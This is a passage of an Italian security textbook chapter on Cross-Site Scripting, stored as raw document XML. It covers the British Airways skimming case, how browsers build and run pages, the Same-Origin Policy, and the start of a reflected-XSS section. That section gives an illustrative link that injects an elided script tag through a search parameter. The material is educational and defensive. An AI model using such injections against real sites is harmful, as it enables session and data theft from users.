          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;div&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, gli attributi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">onclick=...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Quanto ci vorrà:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3 ore con il laboratorio.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nel settembre 2018 British Airways scopre che da due settimane qualcuno ha aggiunto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">22 righe di JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">alla sua pagina di pagamento. Quelle 22 righe inviano silenziosamente i dati della carta di credito di ogni cliente a un server sotto controllo dell’attaccante.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">380.000 transazioni compromesse</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, multa GDPR finale di £20 milioni. Tutto causato da un’iniezione di JavaScript dove non sarebbe dovuto esserci.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Questo è l’effetto del</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-Site Scripting</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(XSS). È OWASP A05 (Injection), insieme a SQL Injection. Mentre la SQLi colpisce il database,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">XSS colpisce il browser dell’utente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— ed è quasi sempre più subdola e più sistemica.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="346" w:name="come-funziona-un-browser"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="540" w:name="sec_8_1"/>
      <w:r>
        <w:t xml:space="preserve">8.1 Come funziona un browser</w:t>
      </w:r>
      <w:bookmarkEnd w:id="540"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per capire XSS bisogna prima capire</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">cosa fa il browser quando riceve una pagina HTML</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Salta questa sezione se hai già fatto il modulo di front-end.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quando il browser riceve la risposta del server, si trova davanti a una stringa di testo come:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pP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Esempio</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DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Ciao</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Benvenuto, Mario!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DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</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"pagina caricata"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</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t xml:space="preserve">Il browser fa tre operazioni in sequenza:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1131"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Parsing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: legge la stringa carattere per carattere, costruisce un albero strutturato chiamato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">DOM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Document Object Model). Il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;h1&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">diventa un nodo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">intestazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;p&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">un nodo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">paragrafo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, e così via.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1131"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Rendering</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: trasforma il DOM in pixel. La pagina appare a video.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1131"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Esecuzione degli script</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: ogni tag</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">incontrato nel DOM viene eseguito. JavaScript ha</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">accesso totale alla pagina</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: può leggere il DOM, modificarlo, leggere/scrivere cookie, fare richieste di rete, accedere a sensori del dispositivo (con permessi), e molto altro.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’aspetto chiave per noi:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">il browser non distingue lo script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">del sito</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">dallo script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">iniettato da un attaccante</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Se è dentro un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nel DOM, viene eseguito. Punto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quindi: chi riesce a far apparire un proprio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dentro la pagina di un altro sito, ha</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">eseguito codice nel browser delle vittime</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Questa è XSS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="346"/>
    <w:bookmarkStart w:id="348" w:name="la-same-origin-policy"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="541" w:name="sec_8_2"/>
      <w:r>
        <w:t xml:space="preserve">8.2 La Same-Origin Policy</w:t>
      </w:r>
      <w:bookmarkEnd w:id="541"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Una premessa fondamentale per capire perché XSS è così potente: la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Same-Origin Policy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(SOP).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I browser implementano una regola di sicurezza stretta:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">uno script eseguito su un sito può accedere solo ai dati di quel sito, non di altri</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Lo script su</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bancapiccola.it</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">non può leggere i cookie di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">gmail.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, non può fare richieste autenticate verso</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">github.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, non può vedere il DOM di una pagina di un altro dominio aperta in un’altra scheda.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Senza questa regola, qualsiasi sito che visiti potrebbe rubare le tue email, svuotare il tuo conto, postare per te su social. La SOP è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">la pietra angolare della sicurezza del web moderno</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">origine</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è definita dalla tripletta:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">protocollo + dominio + porta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Sono origini diverse:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId49">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://bancapiccola.it</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">vs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId50">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://bancapiccola.it</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(protocollo diverso)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId49">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://bancapiccola.it</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">vs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId51">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://blog.bancapiccola.it</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(sottodominio diverso)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId52">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://bancapiccola.it:443</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">vs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId53">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://bancapiccola.it:8443</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(porta diversa)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="347" w:name="perché-xss-è-devastante"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Perché XSS è devastante</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">XSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">bypassa la Same-Origin Policy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dall’interno. L’attaccante non sta facendo richieste cross-origin: sta facendo eseguire il proprio codice</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">come se fosse codice del sito stesso</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Per il browser, è codice di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bancapiccola.it</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">legittimo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Conseguenze: lo script iniettato ha</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">accesso completo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ai cookie di sessione, può fare richieste autenticate, può modificare la pagina, può rubare ciò che l’utente digita.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">L’attaccante diventa l’utente, all’interno del browser della vittima.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="347"/>
    <w:bookmarkEnd w:id="348"/>
    <w:bookmarkStart w:id="352" w:name="i-tre-tipi-di-xss"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="542" w:name="sec_8_3"/>
      <w:r>
        <w:t xml:space="preserve">8.3 I tre tipi di XSS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="542"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">XSS si presenta in tre forme principali: Reflected, Stored, DOM-based. Vediamo le prime due (la terza richiede solidi prerequisiti di JavaScript ed è argomento del secondo anno).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="349" w:name="tipo-1-reflected-xss"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tipo 1 — Reflected XSS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’attaccante manda alla vittima un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">link malevolo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(per email, SMS, social, post di forum). Il link contiene un parametro che il sito vulnerabile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">riflette</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nella pagina di risposta senza filtrarlo. Quando la vittima clicca, il suo browser carica la pagina e —</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ai suoi occhi è bancapiccola.it</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— esegue lo script.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ciclo di vita:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1132"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attaccante crea il link:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId54">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://sito-vulnerabile.it/cerca?q=</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;...&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1132"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lo invia alla vittima</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1132"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La vittima clicca</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1132"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il sito riceve</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">q=&lt;script&gt;...&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e lo include nella pagina di risposta</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1132"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il browser della vittima carica la pagina e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">esegue</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">lo script</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1132"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lo script fa quello che l’attaccante vuole,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">dentro la sessione della vittima</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sul sito legittimo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Lo script vive solo per quel click.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Non resta sul server, non colpisce altri utenti. Per attaccare 1000 vittime servono 1000 click su link malevoli.</w:t>
      </w:r>
